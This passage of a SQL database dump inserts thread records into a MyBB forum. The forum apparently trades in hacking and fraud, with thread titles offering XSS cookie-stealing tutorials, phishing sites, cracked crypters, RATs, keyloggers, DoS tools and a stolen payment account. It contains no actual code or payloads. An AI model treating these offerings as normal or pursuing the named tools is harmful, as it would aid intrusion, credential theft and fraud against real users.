`unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('96', '30', 'FBI Tools [11 in 1]', '0', '0', '0', '1', 't3h jok3r', '1344546455', '229', '1347981764', 'sirchamp', '53', '41', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('97', '12', 'How to XSS and steal Cookies', '0', '0', '0', '1', 't3h jok3r', '1344546730', '231', '1344546730', 't3h jok3r', '1', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('98', '20', 'FREE UD RazorCrypter (Cracked)', '0', '0', '0', '1', 't3h jok3r', '1344547965', '233', '1349731250', 'NeonLights', '203', '42', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('99', '3', '[Previews added]New theme for LH', '0', '0', '0', '1', 't3h jok3r', '1344895893', '237', '1345415977', 't3h jok3r', '1', '68', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('100', '18', '[tut]Hack any facebook or account that use username ID and forum password', '0', '0', '0', '4', 'Triple H', '1344898582', '240', '1349672458', 'Romdu62', '7', '46', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('101', '34', '[tut]Glossy Logo', '0', '0', '0', '4', 'Triple H', '1344898868', '241', '1350130813', 'XxTREYZxX', '257', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('103', '12', '[Tutorial] Stealing Cookies With XSS', '0', '0', '0', '51', 'SAPBasisWorld', '1344957203', '249', '1345143986', 'p420', '9', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('104', '33', 'Photoshop vs Gimp', '0', '0', '0', '13', 'unixmoon', '1344964293', '251', '1345937474', 'Timmy', '5', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('105', '11', 'DDos', '0', '3', '0', '48', 'BurnsH4X', '1344965203', '256', '1345072575', 't3h jok3r', '1', '32', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('106', '38', 'Filling a scam report', '0', '0', '0', '1', 't3h jok3r', '1344965610', '257', '1344965610', 't3h jok3r', '1', '7', '0', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('107', '12', 'how to change the icon of an exe file using resource hacker', '0', '0', '0', '50', 'sana khan', '1344967490', '261', '1345143902', 'p420', '9', '20', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('108', '4', 'Hey all', '0', '0', '0', '53', 'sirchamp', '1344977474', '262', '1345183500', 'Sin Cara', '54', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('109', '4', 'Sin Cara Here', '0', '0', '0', '54', 'Sin Cara', '1344990993', '268', '1345049514', 't3h jok3r', '1', '30', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('110', '4', 'It\'s Baws...the Baws', '0', '0', '0', '55', 'Baws', '1344993153', '271', '1345431846', 'JakeUS', '20', '27', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('111', '29', 'MyFreeCams Model Registeration', '0', '0', '0', '1', 't3h jok3r', '1344993386', '274', '1345784926', 'Thunder™', '84', '31', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('112', '19', '[Junk]??? Ultimate Premium PPD Ebooks Give away ???', '0', '0', '0', '54', 'Sin Cara', '1345011546', '283', '1349309513', 'NXK', '61', '88', '23', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('113', '15', '?Auto Youtube viewer?', '0', '0', '0', '53', 'sirchamp', '1345025859', '286', '1346106053', 't3h jok3r', '1', '53', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('114', '19', '[Junk]Havij', '0', '0', '0', '53', 'sirchamp', '1345027702', '287', '1345059665', 't3h jok3r', '1', '20', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('115', '48', '[tut] How to Moderate LH as a MOD', '0', '0', '0', '1', 't3h jok3r', '1345052054', '290', '1350340504', '??????????¢™', '3', '24', '5', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('116', '43', '[tut] Creating a Kindle PID', '0', '0', '0', '1', 't3h jok3r', '1345061796', '294', '1346797731', 'Timmy', '5', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('117', '46', 'Facebook Phishin* Website [tut]with pictures', '0', '0', '0', '53', 'sirchamp', '1345062424', '296', '1349702699', 'Graycat', '225', '53', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('118', '19', '[Junk]Test son', '0', '0', '0', '1', 't3h jok3r', '1345062793', '297', '1345504689', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('119', '49', 'Disallowed Suggestions', '0', '0', '0', '1', 't3h jok3r', '1345063750', '300', '1345063750', 't3h jok3r', '1', '16', '0', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('120', '4', 'reloadz0r is here', '0', '0', '0', '62', 'R?????zo?', '1345064382', '301', '1345521263', 'JakeUS', '20', '29', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('121', '21', 'kurosaki\'s DOS Tool', '0', '0', '0', '1', 't3h jok3r', '1345064939', '302', '1346767456', 'W33D', '171', '33', '2', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('122', '24', '[tut] Increase your virtual RAM', '0', '0', '0', '1', 't3h jok3r', '1345065123', '304', '1345223197', 'HoverCatz', '67', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('123', '14', 'Top 10 free VPNs', '0', '0', '0', '7', 'Romdu62', '1345065242', '305', '1349527836', 'mothered', '205', '36', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('124', '2', 'Line break mycode', '0', '0', '0', '1', 't3h jok3r', '1345073427', '312', '1345133049', 't3h jok3r', '1', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('125', '29', '[ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '0', '0', '1', 't3h jok3r', '1345075280', '313', '1346254192', 'TheOne™', '144', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('126', '15', 'Adf.ly Bot', '0', '0', '0', '53', 'sirchamp', '1345107167', '315', '1350747515', 'iTzIpod', '82', '52', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('127', '46', 'Will make you a phisher website with theme you request.', '0', '0', '0', '64', 'vlajke', '1345111892', '316', '1346725101', 't3h jok3r', '1', '66', '12', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('128', '19', '[Junk]MoneyBookers acc with ~100$ on it.', '0', '0', '0', '64', 'vlajke', '1345116640', '320', '1345142810', 't3h jok3r', '1', '11', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('129', '8', 'ss501 because i\'m stupid(korean)', '0', '0', '0', '50', 'sana khan', '1345135217', '324', '1345416771', 't3h jok3r', '1', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('130', '15', 'Skype IP Finder - FREE', '0', '0', '0', '67', 'HoverCatz', '1345135783', '325', '1346016634', 't3h jok3r', '1', '114', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('131', '12', '[tut]How to change IP address within seconds.', '0', '0', '0', '9', 'p420', '1345144158', '335', '1345144158', 'p420', '9', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('132', '20', '[Forever FUD]No Dependency Crypter!', '0', '0', '0', '1', 't3h jok3r', '1345145205', '338', '1345506158', 't3h jok3r', '1', '29', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('133', '23', 'Online Scanners list', '0', '0', '0', '19', 'yazz', '1345145459', '339', '1345595162', 'NXK', '61', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('134', '47', 'Win $10 for referring people', '0', '0', '0', '1', 't3h jok3r', '1345151263', '341', '1346035044', 'iTzIpod', '82', '68', '12', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('135', '43', 'Astro Pid [free4all] mediafire', '0', '0', '0', '61', 'NXK', '1345180664', '345', '1345859018', 't3h jok3r', '1', '42', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('136', '53', '[Java] Minecraft Lastlogin Decrypter [Source]', '0', '0', '0', '54', 'Sin Cara', '1345183757', '353', '1345263363', 'Sin Cara', '54', '26', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('137', '13', '[TuT] How to exploit a vulnerable site', '0', '0', '0', '54', 'Sin Cara', '1345183925', '354', '1349480613', 'iTzIpod', '82', '33', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('138', '35', 'Make Cool Logo in just 20 sec....[HOT]', '0', '0', '0', '54', 'Sin Cara', '1345184294', '355', '1350186774', 'XxTREYZxX', '257', '28', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('139', '12', 'Get 60 Minutes skype credit FREE!', '0', '0', '0', '54', 'Sin Cara', '1345185208', '356', '1345856086', 'Sin Cara', '54', '47', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('140', '19', '[Junk]???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '0', '0', '54', 'Sin Cara', '1345186318', '357', '1345934849', 't3h jok3r', '1', '27', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('141', '9', '$30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '19', '0', '60', 'Linux', '1345224075', '368', '1346342033', 'BurnsH4X', '48', '53', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('142', '30', 'Blackshades RAT 5.0 Cracked', '0', '19', '0', '60', 'Linux', '1345224837', '369', '1345554308', 'HoverCatz', '67', '30', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('143', '21', 'Tiny flood', '0', '0', '0', '61', 'NXK', '1345231616', '372', '1345770206', 'Triple H', '4', '34', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('144', '21', 'HTTP bot pack [free direct link]', '0', '0', '0', '61', 'NXK', '1345231914', '373', '1345231914', 'NXK', '61', '25', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('145', '30', 'Stealers/Keyloggers', '0', '0', '0', '61', 'NXK', '1345232233', '374', '1345332603', 'NXK', '61', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('146', '29', 'se7en sins PREMIUM SECTION', '0', '0', '0', '61', 'NXK', '1345232533', '375', '1345557294', 'iTzIpod', '82', '31', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('147', '42', '[Hacker news] BOTNET -The hacker news magazine', '0', '0', '0', '61', 'NXK', '1345248954', '390', '1345498674', 't3h jok3r', '1', '16', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('148', '12', '[Tutorial]How to use Cookies and access Premium Accounts', '0', '0', '0', '54', 'Sin Cara', '1345268116', '395', '1345717785', 'Sin Cara', '54', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('149', '12', 'How to crack your Internet Download Manager forever', '0', '0', '0', '54', 'Sin Cara', '1345268332', '396', '1345722491', 'Sin Cara', '54', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('150', '12', '[TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '0', '0', '54', 'Sin Cara', '1345282396', '398', '1345720070', 'Sin Cara', '54', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('151', '24', 'Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '0', '0', '54', 'Sin Cara', '1345282815', '399', '1345782459', 'Sin Cara', '54', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('152', '30', '[Free] Magic Traffic Bot! [Worth $29.99]', '0', '0', '0', '54', 'Sin Cara', '1345283359', '400', '1345984409', 'Sin Cara', '54', '39', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, 